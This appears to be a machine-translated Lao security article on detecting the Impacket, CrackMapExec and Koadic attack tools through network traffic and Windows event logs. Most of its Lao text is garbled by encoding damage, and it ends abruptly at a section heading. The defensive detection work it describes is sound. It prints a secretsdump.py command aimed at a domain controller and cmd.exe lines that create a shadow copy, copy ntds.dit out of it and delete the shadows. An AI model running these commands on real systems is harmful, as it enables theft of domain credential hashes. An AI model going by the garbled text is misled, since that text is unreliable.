เบเปเบฒเบเบงเบเบเบญเบเบเบฒเบเปเบเบกเบเบตเปเบเบเบฐเปเบซเบเบเบเบฒเบเบเปเบฅเบดเบชเบฑเบเปเบกเปเบเปเบเบตเปเบกเบเบถเปเบเปเบเปเบเปเบฅเบฐเบเบต: เบเบปเบงเบขเปเบฒเบ
เบกเบฑเบเปเบเบฑเบเบกเบนเบเบเปเบฒเบเบตเปเบชเบฑเบเปเบเบเบงเปเบฒเปเบเบทเปเบญเบเบกเบทเปเบซเบผเบปเปเบฒเบเบตเปเบเปเปเปเบเปเบเบทเบเบเปเบฒเปเบเปเบชเปเบฒเบฅเบฑเบเบเบฒเบเปเบเบฒเบฐเปเบเบทเปเบญเบเบเบปเปเบ, เปเบเปเปเบเบทเปเบญเบเบฑเบเบเบฐเบเบฒเบเบฒเบเปเบเบกเบเบตเบเบฒเบเปเบเปเบเบเบชเปเบฒเบเบเบทเปเบเบเบฒเบ. เบเบนเปเปเบเบกเบเบตเปเบเปเบเบงเบเบกเบฑเบเบขเบนเปเปเบเบเบฑเปเบเบเบญเบเบเปเบฒเบเปเบเบญเบเบเบฒเบเปเบเบกเบเบตเบซเบผเบฑเบเบเบฒเบเบเบฒเบเปเบเบฒเบฐเบเบญเบ perimeter. เบเบตเป, เปเบเบเบงเบดเบเบตเบเบฒเบเบเบฒเบ, เปเบกเปเบเบเบฒเบเบเบตเปเบเบฐเบเบงเบเบเบปเบเปเบฅเบฐเบกเบฑเบเบเบฐเบกเบตเบเบฝเบเปเบเปเบเบฒเบเบเปเบงเบเปเบซเบผเบทเบญเบเบญเบเปเบเบฑเบเปเบเปเบฅเบขเบต
เบชเบดเปเบเบเบตเปเบเบงเบเปเบฎเบปเบฒเบเปเบฒเปเบเบฑเบเบเปเบญเบเปเบฎเบฑเบ:
- เปเบเบปเปเบฒเปเบเบงเบดเบเบตเบเบฒเบ hacking เปเบเบทเปเบญเบเบกเบทเปเบฎเบฑเบเบงเบฝเบ. เบเบญเบเบซเบฒเบชเบดเปเบเบเบตเปเบเบนเปเปเบเบกเบเบตเบเปเบญเบเบเบฒเบเปเบเปเบเบฐเปเบซเบเบ เปเบฅเบฐเปเบเบฑเบเปเบเปเบฅเบเบตเปเบเบเบตเปเปเบเบปเบฒเปเบเบปเปเบฒเบชเบฒเบกเบฒเบเปเบเป.
- เบเบญเบเบซเบฒเบชเบดเปเบเบเบตเปเบเปเปเบเบทเบเบเบงเบเบเบปเบเปเบเบเปเบเบทเปเบญเบเบกเบทเบเบงเบฒเบกเบเบญเบเปเบเบเปเปเบกเบนเบเปเบเบเบฑเปเบเบเบญเบเบเปเบฒเบญเบดเบเบเบญเบเบเบฒเบเปเบเบกเบเบต. เปเบฅเบเบฐเบเบฒเบเบชเบญเบเปเบเบกเบญเบฒเบเบเบฐเบเบทเบเบเปเบฒเบกเปเบ, เบเปเปเบงเปเบฒเบเบฐเปเบเบฑเบเบเปเบญเบเบงเปเบฒเบเบนเปเปเบเบกเบเบตเปเบเบฑเบเบเบนเปเปเบเบกเบเบตเบเบฒเบเปเบ, เบซเบผเบทเบเปเบญเบเบงเปเบฒเบเบนเปเปเบเบกเบเบตเบเปเบฒเบฅเบฑเบเบเบธเบเบเบปเปเบเบเบธเบกเปเบเปเบเบเบชเปเบฒเบเบเบทเปเบเบเบฒเบเบเบตเปเบเปเปเบฎเบนเปเบกเบฒเบเปเบญเบ. เบกเบฑเบเปเบเบฑเบเปเบเปเบเปเบเบตเปเบเบฐเบเบทเปเบเบเบนเบฅเบฐเบเบปเบเบเปเบญเบเปเบชเปเบเบฑเบเบซเบกเบปเบเบเบญเบเบเบฒเบเบเบฐเบเปเบฒเบเบญเบเบฅเบฒเบง, เบเบฑเปเบเบเบฑเปเบเบเบงเบฒเบกเบเบฒเบเบฐเบซเบเบฒเบเบตเปเบเบฐเบเบงเบเบเบปเบเบเบฒเบเปเบเบทเปเบญเบเปเบซเบงเบเบทเปเบกเบญเบตเบ.
- เบเปเบฒเบเบฑเบเบเบปเบเบเบงเบเบเบตเปเบเปเปเบเบทเบเบเปเบญเบเบเบฒเบเปเบเบทเปเบญเบเบกเบทเบเบงเบเบซเบฒเบเบฒเบเบเบธเบเบฅเบธเบ. เบเบงเบเปเบฎเบปเบฒเบเปเบญเบเบเปเปเบฅเบทเบกเบงเปเบฒเปเบเปเบงเบฅเบฒเบเบตเปเบเบฒเบเบเปเบฒเปเบเบตเบเบเบฒเบเบชเบฐเปเบเบฒเบฐเปเบเบซเบเบถเปเบเบเบทเบเบเบงเบเบเบปเบเบเบปเบเบเบทเปเบเบเบฒเบเบเบญเบ reconnaissance เบเบฝเบง, เบเบงเบฒเบกเบเบดเบเบเบฒเบเปเบฅเบทเปเบญเบเปเปเบกเปเบเปเบเบฑเบเปเบเปเบเป. เบเบปเบเบเบฐเบเบดเปเบฅเปเบงเปเบเปเบเบเบชเปเบฒเบเบเบทเปเบเบเบฒเบเบกเบตเบเปเบฒเบเบงเบเบเบฝเบเบเปเบเบญเบเบงเบดเบเบตเบเบฒเบ, indistinguishable เบเบฒเบเบญเบฑเบเบเบตเปเบเบทเบเบเปเบญเบเบขเบนเป glance เบเปเบฒเบญเบดเบ, เปเบเบทเปเบญเปเบซเปเปเบเปเบฎเบฑเบเบเปเปเบกเบนเบเปเบเป.
เปเบเบทเปเบญเบเบกเบทเปเบซเบผเบปเปเบฒเบเบตเปเปเบซเปเบเบนเปเปเบเบกเบเบตเบซเบเบฑเบ? เบเปเบฒเบซเบฒเบเบงเปเบฒเบเบตเปเปเบกเปเบ Impacket, เบซเบผเบฑเบเบเบฒเบเบเบฑเปเบเบเบนเปเปเบเบกเบเบตเปเบเปเบฎเบฑเบเบซเปเบญเบเบชเบฐเบซเบกเบธเบเบเบฐเบซเบเบฒเบเปเบซเบเปเบเบญเบเปเบกเบเบนเบเบเบตเปเบชเบฒเบกเบฒเบเปเบเปเบฎเบฑเบเบเบฒเบเบเปเบฒเปเบเปเปเบเปเบฅเบเบฐเบเบตเปเปเบเบเบเปเบฒเบเบเบฑเบเบเบญเบเบเบฒเบเปเบเบกเบเบตเบเบตเปเบเบฐเบเบดเบเบฑเบเบเบฒเบกเบซเบผเบฑเบเบเบฒเบ breaking perimeter เปเบเป. เปเบเบทเปเบญเบเบกเบทเบเปเบฒเบเบงเบเบซเบผเบฒเบเปเบเปเปเบกเบเบนเบ Impacket เบเบฒเบเปเบ - เบเบปเบงเบขเปเบฒเบ, Metasploit. เบกเบฑเบเบกเบต dcomexec เปเบฅเบฐ wmiexec เบชเปเบฒเบฅเบฑเบเบเบฒเบเบเบฐเบเบดเบเบฑเบเบเปเบฒเบชเบฑเปเบเบซเปเบฒเบเปเบเบชเบญเบเบซเบผเบตเบ, secretsdump เบชเปเบฒเบฅเบฑเบเบเบฒเบเปเบเปเบฎเบฑเบเบเบฑเบเบเบตเบเบฒเบเบซเบเปเบงเบเบเบงเบฒเบกเบเปเบฒเบเบตเปเปเบเบตเปเบกเบเบฒเบ Impacket. เบเบฑเปเบเบเบฑเปเบ, เบเบฒเบเบเบงเบเบชเบญเบเบเบงเบฒเบกเบเบทเบเบเปเบญเบเบเบญเบเบเบดเบเบเบฐเบเปเบฒเบเบญเบเบซเปเบญเบเบชเบฐเบซเบกเบธเบเบเบฑเปเบเบเปเบฒเบงเบเบฐเบฎเบฑเบเบเบฐเบเบฑเบเบเบฒเบเบเบงเบเบเบปเบเบเบญเบเบญเบฐเบเบธเบเบฑเบ.
เบกเบฑเบเบเปเปเปเบกเปเบเปเบฅเบทเปเบญเบเบเบฑเบเปเบญเบตเบเบเบตเปเบเบนเปเบชเปเบฒเบเบเบฝเบเบงเปเบฒ "Powered by Impacket" เบเปเบฝเบงเบเบฑเบ CrackMapExec (เบซเบผเบทเบเบฝเบเปเบเป CME). เบเบญเบเบเบฒเบเบเบฑเปเบ, CME เบกเบตเบซเบเปเบฒเบเบตเปเบเบฝเบกเบเปเบญเบกเบชเปเบฒเบฅเบฑเบเบชเบฐเบเบฒเบเบฐเบเบฒเบเบเบตเปเบเบดเบเบปเบก: Mimikatz เบชเปเบฒเบฅเบฑเบเบเบฒเบเปเบเปเบฎเบฑเบเบฅเบฐเบซเบฑเบเบเปเบฒเบเบซเบผเบท hashes เบเบญเบเปเบเบปเบฒเปเบเบปเปเบฒ, เบเบฒเบเบเบฐเบเบดเบเบฑเบ Meterpreter เบซเบผเบท Empire เบเบปเบงเปเบเบเบชเปเบฒเบฅเบฑเบเบเบฒเบเบเบฐเบเบดเบเบฑเบเบซเปเบฒเบเปเบเบชเบญเบเบซเบผเบตเบ, เปเบฅเบฐ Bloodhound เปเบเบดเบเปเบฎเบทเบญ.
เปเบเบทเปเบญเบเบกเบทเบเบตเบชเบฒเบกเบเบตเปเบเบงเบเปเบฎเบปเบฒเปเบฅเบทเบญเบเปเบกเปเบ Koadic. เบกเบฑเบเปเบกเปเบเบเปเบญเบเบเปเบฒเบเบเปเปเบเบปเบเบกเบฒเบเบตเป, เบกเบฑเบเบเบทเบเบเปเบฒเบชเบฐเปเบซเบเบตเบขเบนเปเปเบเบเบญเบเบเบฐเบเบธเบกเบชเบฒเบเบปเบเบเบญเบเปเบฎเบเปเบเบต DEFCON 25 เปเบ 2017 เปเบฅเบฐเบเบทเบเบเปเบฒเปเบเบเปเบเบเบงเบดเบเบตเบเบฒเบเบเบตเปเบเปเปเปเบกเปเบเบกเบฒเบเบเบฐเบเบฒเบ: เบกเบฑเบเปเบฎเบฑเบเบงเบฝเบเบเปเบฒเบ HTTP, Java Script เปเบฅเบฐ Microsoft Visual Basic Script (VBS). เบงเบดเบเบตเบเบฒเบเบเบตเปเปเบญเบตเปเบเบงเปเบฒเบเบฒเบเบเปเบฒเบฅเบปเบเบเบตเบงเบดเบ off เบเบตเปเบเบดเบ: เปเบเบทเปเบญเบเบกเบทเบเปเบฒเปเบเปเบเบธเบเบเบญเบ dependencies เปเบฅเบฐเบซเปเบญเบเบชเบฐเบซเบกเบธเบเบเบตเปเบชเปเบฒเบเบเบถเปเบเปเบ Windows. เบเบนเปเบชเปเบฒเบเปเบญเบตเปเบเบกเบฑเบเบงเปเบฒ COM Command & Control, เบซเบผเบท C3.
เบเบปเบเบเบฐเบเบปเบ
เบเบฒเบเปเบฎเบฑเบเบงเบฝเบเบเบญเบ Impacket เปเบกเปเบเบเบงเปเบฒเบเบซเบผเบฒเบ, เบเบฑเปเบเปเบเปเบเบฒเบเบชเบญเบเปเบเบกเบเบฒเบเปเบ AD เปเบฅเบฐเปเบเบฑเบเบเปเบฒเบเปเปเบกเบนเบเบเบฒเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบ MS SQL เบเบฒเบเปเบ, เปเบเบฑเบเบเบดเบเบเบฒเบเปเบเปเบฎเบฑเบเบเปเปเบกเบนเบเบเบฐเบเปเบฒเบเบปเบง: เบเบตเปเปเบกเปเบเบเบฒเบเปเบเบกเบเบต SMB relay, เปเบฅเบฐเบเบฒเบเปเบเปเบฎเบฑเบเปเบเบฅเป ntds.dit เบเบตเปเบกเบต hashes เบเบญเบเบฅเบฐเบซเบฑเบเบเปเบฒเบเบเบญเบเบเบนเปเปเบเปเบเบฒเบเบเบปเบงเบเบงเบเบเบธเบกเปเบเปเบกเบ. Impacket เบเบฑเบเบเบฐเบเบดเบเบฑเบเบเปเบฒเบชเบฑเปเบเบซเปเบฒเบเปเบเบชเบญเบเบซเบผเบตเบเปเบเบเปเบเปเบชเบตเปเบงเบดเบเบตเบเบตเปเปเบเบเบเปเบฒเบเบเบฑเบ: WMI, Windows Scheduler Management Service, DCOM, เปเบฅเบฐ SMB, เปเบฅเบฐเบเปเบญเบเบเบฒเบเบเปเปเบกเบนเบเบเบฐเบเปเบฒเปเบเบทเปเบญเปเบฎเบฑเบเปเบเบงเบเบฑเปเบ.
เบเบงเบฒเบกเบฅเบฑเบ
เบฅเบญเบเบกเบฒเปเบเบดเปเบเปเบฅเบทเปเบญเบเบฅเบฑเบเป. เบเบตเปเปเบกเปเบเปเบกเบเบนเบเบเบตเปเบชเบฒเบกเบฒเบเปเบเบปเปเบฒเบซเบกเบฒเบเบเบฑเบเปเบเบทเปเบญเบเบเบฑเบเบเบญเบเบเบนเปเปเบเปเปเบฅเบฐเบเบปเบงเบเบงเบเบเบธเบกเปเบเปเบกเบ. เบกเบฑเบเบชเบฒเบกเบฒเบเบเบทเบเบเปเบฒเปเบเปเปเบเบทเปเบญเปเบซเปเปเบเปเบชเปเบฒเปเบเบปเบฒเบเบทเปเบเบเบตเปเบซเบเปเบงเบเบเบงเบฒเบกเบเปเบฒ LSA, SAM, SECURITY, NTDS.dit, เบเบฑเปเบเบเบฑเปเบเบกเบฑเบเบชเบฒเบกเบฒเบเปเบซเบฑเบเปเบเปเปเบเบเบฑเปเบเบเบญเบเบเปเบฒเบเปเบเบญเบเบเบฒเบเปเบเบกเบเบต. เบเบฑเปเบเบเบญเบเบเปเบฒเบญเบดเบเปเบเบเบฒเบเบเปเบฒเปเบเบตเบเบเบฒเบเบเบญเบเปเบกเบเบนเบเปเบกเปเบเบเบฒเบเบเบงเบเบชเบญเบเบเปเบฒเบ SMB, เปเบเบดเปเบเบเปเบญเบเบเบฒเบเบฅเบฐเบซเบฑเบเบเปเบฒเบเบเบญเบเบเบนเปเปเบเปเบซเบผเบท hash เบเบญเบเบกเบฑเบเปเบเบทเปเบญเบเบฐเบเบดเบเบฑเบเบเบฒเบเปเบเบกเบเบต Pass the Hash เปเบเบเบญเบฑเบเบเบฐเปเบเบกเบฑเบ. เบเปเปเปเบเปเบกเปเบเบเบฒเบเบฎเปเบญเบเบเปเปเบซเปเปเบเบตเบเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบ Service Control Manager (SCM) เปเบฅเบฐเปเบเบปเปเบฒเปเบเบดเบเบเบฒเบเบฅเบปเบเบเบฐเบเบฝเบเบเปเบฒเบ winreg protocol, เปเบเบเปเบเปเบเบตเปเบเบนเปเปเบเบกเบเบตเบชเบฒเบกเบฒเบเบเบญเบเบซเบฒเบเปเปเบกเบนเบเบชเบฒเบเบฒเบเบตเปเบกเบตเบเบงเบฒเบกเบชเบปเบเปเบเปเบฅเบฐเปเบเปเบฎเบฑเบเบเบปเบเปเบเปเบฎเบฑเบเบเปเบฒเบ SMB.
เปเบเบฎเบนเบ. 1 เบเบงเบเปเบฎเบปเบฒเปเบเบดเปเบเบงเปเบฒเปเบเปเบงเบฅเบฒเบเบตเปเปเบเป winreg protocol, เบเบฒเบเปเบเบปเปเบฒเปเบเบดเบเปเบกเปเบเปเบเปเบฎเบฑเบเปเบเบเปเบเปเบฅเบฐเบซเบฑเบเบฅเบตเบเบดเบเบเบตเบเบตเปเบกเบต LSA. เปเบเบทเปเบญเปเบฎเบฑเบเบชเบดเปเบเบเบตเป, เปเบเปเบเปเบฒเบชเบฑเปเบ DCERPC เบเบฑเบ opcode 15 - OpenKey.
เปเบเบปเปเบฒ. 1. เบเบฒเบเปเบเบตเบเบฅเบฐเบซเบฑเบเบเบฒเบเบฅเบปเบเบเบฐเบเบฝเบเปเบเบเปเบเป winreg protocol
เบเปเปเปเบ, เปเบกเบทเปเบญเปเบเปเบฎเบฑเบเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบเบเบตเปเบชเปเบฒเบเบฑเบ, เบกเบนเบเบเปเบฒเบเบทเบเบเบฑเบเบเบถเบเปเบงเปเบเปเบงเบเบเปเบฒเบชเบฑเปเบ SaveKey เบเบฑเบ opcode 20. Impacket เปเบฎเบฑเบเปเบเบเบเบตเปเปเบเบฅเบฑเบเบชเบฐเบเบฐเบชเบฐเปเบเบฒเบฐ. เบกเบฑเบเบเบฑเบเบเบถเบเบเปเบฒเบเปเบฒเบเปเปเบชเปเปเบเบฅเปเบเบตเปเบกเบตเบเบทเปเปเบเบฑเบ 8 เบเบปเบงเบญเบฑเบเบชเบญเบเบชเบธเปเบกเบเปเปเบเปเบฒเบเบเปเบงเบ .tmp. เบเบญเบเบเบฒเบเบเบฑเปเบ, เบเบฒเบเบญเบฑเบเปเบซเบฅเบเปเบเบฅเปเบเบตเปเปเบเบตเปเบกเปเบเบตเบกเปเบเบตเบเบเบถเปเบเบเปเบฒเบ SMB เบเบฒเบเปเบเปเบฅเบเบฐเบเปเบฅเบต System32 (เบฎเบนเบ 2).
เปเบเบปเปเบฒ. 2. เปเบเบโเบเบฒเบโเบชเปเบฒโเบฅเบฑเบโเบเบฒเบโเปเบเปโเบฎเบฑเบโเบเบฐโเปเบโเบเบฒเบโเบเบปเบโเบเบฐโเบเบฝเบโเบเบฒเบโเปเบเบทเปเบญเบโเบซเปเบฒเบโเปเบโเบชเบญเบโเบซเบผเบตเบโ
เบกเบฑเบเบเบฐเบเบปเบเบงเปเบฒเบเบดเบเบเบฐเบเปเบฒเบเบฑเปเบเบเปเบฒเบงเบขเบนเปเปเบเปเบเบทเบญเบเปเบฒเบเบชเบฒเบกเบฒเบเบเบงเบเบเบปเบเปเบเปเปเบเบเบเบฒเบเบชเบญเบเบเบฒเบกเบเบฑเบเบชเบฒเบเบฒเบเบฒเบเบฅเบปเบเบเบฐเบเบฝเบเบเบฒเบเบขเปเบฒเบเปเบเบเปเบเปเปเบเปเบเบเบญเบ winreg, เบเบทเปเบชเบฐเปเบเบฒเบฐ, เบเปเบฒเบชเบฑเปเบเปเบฅเบฐเบเปเบฒเบชเบฑเปเบเบเบญเบเบเบงเบเปเบเบปเบฒ.
เปเบกเบเบนเบเบเบตเปเบเบฑเบเบเปเบญเบเปเบซเปเบฎเปเบญเบเบฎเบญเบเบขเบนเปเปเบเบเบฑเบเบเบถเบเปเบซเบเบเบฒเบ Windows, เปเบฎเบฑเบเปเบซเปเบกเบฑเบเบเปเบฒเบเบเปเปเบเบฒเบเบเบงเบเบเบปเบ. เบเบปเบงเบขเปเบฒเบ, เปเบเบฑเบเบเบปเบเบกเบฒเบเบฒเบเบเบฒเบเบเบฐเบเบดเบเบฑเบเบเปเบฒเบชเบฑเปเบ
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC
เปเบเบเบฑเบเบเบถเบเบเบญเบ Windows Server 2016 เบเบงเบเปเบฎเบปเบฒเบเบฐเปเบซเบฑเบเบฅเปเบฒเบเบฑเบเปเบซเบเบเบฒเบเบชเปเบฒเบเบฑเบเบเปเปเปเบเบเบตเป:
1. 4624 - remote Logon.
2. 5145 - เบเบฒเบเบเบงเบเบชเบญเบเบชเบดเบเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบเบเบฒเบเบเปเบฅเบดเบเบฒเบเบเบฒเบเปเบ winreg.
3. 5145 - เบเบฒเบเบเบงเบเบชเบญเบเบชเบดเบเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบเปเบเบฅเปเปเบเบฅเบฐเบเบปเบ System32. เปเบเบฅเปเบกเบตเบเบทเปเปเบเบเบชเบธเปเบกเบเบตเปเปเบเปเบเปเบฒเบงเบกเบฒเบเปเบฒเบเปเบเบดเบ.
4. 4688 - เบเบฒเบเบชเปเบฒเบเบเบฐเบเบงเบเบเบฒเบ cmd.exe เบเบตเปเปเบเบตเบเบเบปเบง vssadmin:
โC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - เบเบฒเบเบชเปเบฒเบเบเบฐเบเบงเบเบเบฒเบเบเปเบงเบเบเปเบฒเบชเบฑเปเบ:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
6. 4688 - เบเบฒเบเบชเปเบฒเบเบเบฐเบเบงเบเบเบฒเบเบเปเบงเบเบเปเบฒเบชเบฑเปเบ:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
7. 4688 - เบเบฒเบเบชเปเบฒเบเบเบฐเบเบงเบเบเบฒเบเบเปเบงเบเบเปเบฒเบชเบฑเปเบ:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
Smbexec
เปเบเบฑเปเบเบเบฝเบงเบเบฑเบเบเบฑเบเปเบเบทเปเบญเบเบกเบทเบซเบผเบฑเบเบเบฒเบเบเบนเบเบฎเบตเบเบเปเบฒเบเบงเบเบซเบผเบฒเบ, Impacket เบกเบตเปเบกเบเบนเบเบชเปเบฒเบฅเบฑเบเบเบฒเบเบเบฐเบเบดเบเบฑเบเบเปเบฒเบชเบฑเปเบเบซเปเบฒเบเปเบเบชเบญเบเบซเบผเบตเบ. เบเบงเบเปเบฎเบปเบฒเบเบฐเบชเบธเบกเปเบชเป smbexec, เปเบเบดเปเบเบชเบฐเบซเบเบญเบ shell เบเปเบฒเบชเบฑเปเบเบเบฒเบเปเบเปเบเบญเบเปเบเปเบเบทเปเบญเบเบซเปเบฒเบเปเบเบชเบญเบเบซเบผเบตเบ. เปเบกเบเบนเบเบเบตเปเบเบฑเบเบเปเบญเบเบเบฒเบเบเบฒเบเบเบดเบชเบนเบเบขเบทเบเบขเบฑเบเบเปเบฒเบ SMB, เบเปเปเบงเปเบฒเบเบฐเปเบเบฑเบเบฅเบฐเบซเบฑเบเบเปเบฒเบเบซเบผเบท hash เบฅเบฐเบซเบฑเบเบเปเบฒเบ. เปเบเบฎเบนเบ. เปเบเบฎเบนเบเบเบต 3 เบเบงเบเปเบฎเบปเบฒเปเบซเบฑเบเบเบปเบงเบขเปเบฒเบเบเบญเบเบงเบดเบเบตเบเบฒเบเปเบฎเบฑเบเบงเบฝเบเบเบญเบเปเบเบทเปเบญเบเบกเบทเบเบฑเปเบเบเปเบฒเบง, เปเบเบเปเบฅเบฐเบเบตเบเบตเปเบกเบฑเบเปเบกเปเบ console เบเบญเบเบเบนเปเบเปเบฅเบดเบซเบฒเบเบเปเบญเบเบเบดเปเบ.
เปเบเบปเปเบฒ. 3. Interactive smbexec console
เบเบฑเปเบเบเบญเบเบเปเบฒเบญเบดเบเบเบญเบ smbexec เบซเบผเบฑเบเบเบฒเบเบเบฒเบเบเบดเบชเบนเบเบขเบทเบเบขเบฑเบเปเบกเปเบเปเบเบทเปเบญเปเบเบตเบ SCM เบเปเบงเบเบเปเบฒเบชเบฑเปเบ OpenSCManagerW (15). เบเบฒเบเบชเบญเบเบเบฒเบกเปเบกเปเบเบซเบเปเบฒเบชเบฑเบเปเบเบ: เบเบฒเบเบชเบฐเบซเบเบฒเบก MachineName เปเบกเปเบ DUMMY.
เปเบเบปเปเบฒ. 4. เบฎเปเบญเบเบเปเปเบซเปเปเบเบตเบ Service Control Manager
เบเปเปเปเบ, เบเบฒเบเบเปเบฅเบดเบเบฒเบเบเบทเบเบชเปเบฒเบเบเบทเปเบเปเบเบเปเบเปเบเปเบฒเบชเบฑเปเบ CreateServiceW (12). เปเบเบเปเบฅเบฐเบเบตเบเบญเบ smbexec, เบเบงเบเปเบฎเบปเบฒเบชเบฒเบกเบฒเบเปเบซเบฑเบเปเบซเบเบเบปเบเบเบฒเบเบเปเปเบชเปเบฒเบเบเปเบฒเบชเบฑเปเบเบเบฝเบงเบเบฑเบเบเบธเบเบเบฑเปเบ. เปเบเบฎเบนเบ. 5 เบชเบตเบเบฝเบงเบชเบฐเปเบเบเปเบเบดเบเบเบปเบงเบเปเบฒเบเบปเบเบเปเบฒเบชเบฑเปเบเบเบตเปเบเปเปเบชเบฒเบกเบฒเบเบเปเบฝเบเปเบเบเปเบเป, เบชเบตเปเบซเบผเบทเบญเบเบเบตเปเปเบซเปเปเบซเบฑเบเปเบเบดเบเบชเบดเปเบเบเบตเปเบเบนเปเปเบเบกเบเบตเบชเบฒเบกเบฒเบเบเปเบฝเบเปเบเบเปเบเป. เบกเบฑเบเบเปเบฒเบเบเบตเปเบเบฐเปเบซเบฑเบเบงเปเบฒเบเบทเปเบเบญเบเปเบเบฅเปเบเบตเปเบชเบฒเบกเบฒเบเบเบฐเบเบดเบเบฑเบเปเบเป, เปเบเปเบฅเบเบฐเบเปเบฅเบตเบเบญเบเบกเบฑเบเปเบฅเบฐเปเบเบฅเปเบเบปเบเบเบฐเบฅเบดเบเบชเบฒเบกเบฒเบเบเปเบฝเบเปเบเบเปเบเป, เปเบเปเบชเปเบงเบเบเบตเปเปเบซเบผเบทเบญเปเบกเปเบเบกเบตเบเบงเบฒเบกเบซเบเบธเปเบเบเบฒเบเบซเบผเบฒเบเบเบตเปเบเบฐเบเปเบฝเบเปเบเบเบเปเปเบกเบตเบเบฒเบเบฅเบปเบเบเบงเบเปเบซเบเบเบปเบเบเบญเบเปเบกเบเบนเบ Impacket.
เปเบเบปเปเบฒ. 5. เบฎเปเบญเบเบเปเปเบซเปเบชเปเบฒเบเบเปเบฅเบดเบเบฒเบเปเบเบเปเบเป Service Control Manager
Smbexec เบเบฑเบเบเปเบญเบเปเบซเปเบฎเปเบญเบเบฎเบญเบเบเบตเปเบเบฑเบเปเบเบเบขเบนเปเปเบเบเบฑเบเบเบถเบเปเบซเบเบเบฒเบ Windows. เปเบเบเบฑเบเบเบถเบเบเบญเบ Windows Server 2016 เบชเปเบฒเบฅเบฑเบเปเบเบฐเบเปเบฒเบชเบฑเปเบเปเบเบเปเบเปเบเบญเบเบเบฑเบเบเปเบฒเบชเบฑเปเบ ipconfig, เบเบงเบเปเบฎเบปเบฒเบเบฐเปเบซเบฑเบเบฅเปเบฒเบเบฑเบเปเบซเบเบเบฒเบเบชเปเบฒเบเบฑเบเบเปเปเปเบเบเบตเป:
1. 4697 โ เบเบฒเบโเบเบดเบโเบเบฑเปเบโเบเบฒเบโเบเปโเบฅเบดโเบเบฒเบโเปเบโเปเบเบทเปเบญเบโเบเบญเบโเบเบนเปโเปเบเบฒเบฐโเบฎเปเบฒเบโ:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - เบเบฒเบเบชเปเบฒเบเบเบฐเบเบงเบเบเบฒเบ cmd.exe เบเปเบงเบเบเบฒเบเปเบเปเบเบฝเบเบเบฒเบเบเบธเบ 1.
3. 5145 - เบเบฒเบเบเบงเบเบชเบญเบเบชเบดเบเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบเปเบเบฅเป __output เปเบเปเบเปเบฅเบเบฐเบเปเบฅเบต C$.
4. 4697 โ เบเบฒเบโเบเบดเบโเบเบฑเปเบโเบเบฒเบโเบเปโเบฅเบดโเบเบฒเบโเปเบโเปเบเบทเปเบญเบโเบเบญเบโเบเบนเปโเบเบทเบโเปเบเบฒเบฐโเบฎเปเบฒเบโ.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - เบเบฒเบเบชเปเบฒเบเบเบฐเบเบงเบเบเบฒเบ cmd.exe เบเปเบงเบเบเบฒเบเปเบเปเบเบฝเบเบเบฒเบเบเบธเบ 4.
6. 5145 - เบเบฒเบเบเบงเบเบชเบญเบเบชเบดเบเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบเปเบเบฅเป __output เปเบเปเบเปเบฅเบเบฐเบเปเบฅเบต C$.
Impacket เปเบกเปเบเบเบทเปเบเบเบฒเบเบชเปเบฒเบฅเบฑเบเบเบฒเบเบเบฑเบเบเบฐเบเบฒเปเบเบทเปเบญเบเบกเบทเบเบฒเบเปเบเบกเบเบต. เบกเบฑเบเบชเบฐเบซเบเบฑเบเบชเบฐเบซเบเบนเบเปเบเบทเบญเบเบเบธเบเปเบเปเบเบเบญเบเปเบเปเบเบเบชเปเบฒเบเบเบทเปเบเบเบฒเบเบเบญเบ Windows เปเบฅเบฐเปเบเปเบงเบฅเบฒเบเบฝเบงเบเบฑเบเบกเบตเบฅเบฑเบเบชเบฐเบเบฐเบฅเบฑเบเบชเบฐเบเบฐเบเบญเบเบเบปเบเปเบญเบ. เบเบตเปเปเบกเปเบเบเปเบฒเบฎเปเบญเบเบเป winreg เบชเบฐเปเบเบฒเบฐ, เปเบฅเบฐเบเบฒเบเบเปเบฒเปเบเป SCM API เบเบฑเบเบเบฒเบเบชเปเบฒเบเบเปเบฒเบชเบฑเปเบเบฅเบฑเบเบชเบฐเบเบฐ, เปเบฅเบฐเบฎเบนเบเปเบเบเบเบทเปเปเบเบฅเป, เปเบฅเบฐ SMB เปเบเปเบเบเบฑเบ SYSTEM32.
CRACKMAPEXEC
